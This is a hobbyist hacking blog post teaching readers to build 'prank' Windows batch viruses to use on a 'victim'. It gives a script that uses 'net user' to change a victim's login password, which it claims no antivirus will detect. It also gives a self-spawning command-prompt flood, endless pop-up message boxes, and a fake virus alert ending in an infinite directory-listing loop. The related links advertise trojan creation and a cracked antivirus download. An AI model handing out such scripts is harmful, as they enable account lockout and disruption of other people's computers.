Thursday, September 9, 2010

Creating .bat programs

November 13, 2008 by admin  
Filed under Hacks

Hey guys using .bat format you can do amazing stuff that you would have never imagined .I will just give a short note on what .bat files are :

A file containing a series of commands to be executed. A batch file is normally used to automate a multi-step process into one single execution.

We use this even in the evil way ! Ha ha !

Lean how to REAL VIRUS

First Batch File ( Changing passord of username without entering into administrator )

This tiny little program,but destructive can change or set a password during the windows log in screen .This will not be detected as a virus by any computer or Anti-Virus.

Just copy and paste this code :

@echo off

net user ### “****l”

echo //////////

pause

Copy this code in notepad and change the ### into the victims user name i.e Computer name and change **** into the password you want to set and //// into your message you want to give .Then save this as love.bat and then if you want if you experiment on yourself.It absolutely has no harm on the computer! it only sets a password .

Second Batch File ( Creating Fake Virus 1)

This batch file that i am going to tell is a simple but a pranky command

So,copy this code in notepad :

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

slow.bat

start

The more number of times you are going to paste ,the more number of times its effective . This simple program continuously open command prompt till the command get over if you want you can try it on your computers .but if you create it many times then it might create problems !

Third Batch File ( Creating Fake Virus 2 )

This file opens as many dialogue boxes as mentioned in program and disables close and the victim has no other way other than clicking ‘yes’ or ‘no’

Heres the command ,asusual copy this in notepad and save it as virus.bat

msgbox”THIS IS VIRUS BY hack-genius.blogspot.com”,20,”VIRUSSSS”

msgbox”THIS IS VIRUS BY hack-genius.blogspot.com!2″,20,”VIRUSSSS 2″

msgbox”THIS IS VIRUS BY hack-genius.blogspot.com3″,20,”VIRUSSSS 3″

msgbox”THIS IS VIRUS BY hack-genius.blogspot.com4″,20,”VIRUSSSS 4″

msgbox”THIS IS VIRUS BY hack-genius.blogspot.com5″,20,”VIRUSSSS 5″

msgbox”THIS IS VIRUS BY hack-genius.blogspot.com”,20,”VIRUSSSS 6″

msgbox”THIS IS VIRUS BY hack-genius.blogspot.com”,20,”VIRUSSSS 7″

msgbox”THIS IS VIRUS BY hack-genius.blogspot.com8″,20,”VIRUSSSS 8″

If you wanr the more number of dialogue boxes just the command once or how many ever times you want and chanage the number accordingly.Ex. i have only 8 boxes so i end it with 1-8.If you want twenty then change it from 1-20.Simple !

Fourth Batch File ( Creating a fake VIRUS 3 )

This is a intimating virus but absoulutely nothing .What this thing does is ,when you open the file it tell that a virus has been dtected and want to activate in computer . Not scary for you because you know,or else the victim will b flat !

Anyway,lets come back to the command .Copy and paste this in notepad and save it as virus.bat

@echo off

title VIRUSSSSSSSS BY hack-genius.blogspot.com

color 04

echo YOU HAVE A VIRUS ON YOUR COMPUTER!!!!!!!!

pause

echo CONTACTING ANTIVIRUS…………..

pause

echo Do YOU WANT TO DELETE THE VIRUS?????

pause

echo ACCESS DENIED !!!!!!!!

echo ACCESS DENIED !!!!!!!!

echo ACCESS DENIED !!!!!!!!

echo ACCESS DENIED !!!!!!!!

pause

echo INITIATING VIRUSS !!!!!!!

pause

echo ACTIVATING VIRUS…..

pause

echo VIRUS ACTIVATED!!!!

pause

:1

dir/s

goto 1

Thats it man hope you enjoyed and make sure you subscribe to my posts !

Related posts:

  1. Create a Simple beginner Virus in notepad ...
  2. Create a Simple beginner Virus in notepad ...
  3. Creating A Trojan ...
  4. Create 3 Simple Fake Viruses using Command Prompt and Visual Basic ...
  5. How to Compile C Programs ...
  6. Some more Hacks in Command Prompt ! ...
  7. Create a Fake And A Destructive Virus in Notepad ...
  8. Download Norton Anti-Virus 2009 Crack ...

Speak Your Mind

Tell us what you're thinking...
and oh, if you want a pic to show with your comment, go get a gravatar!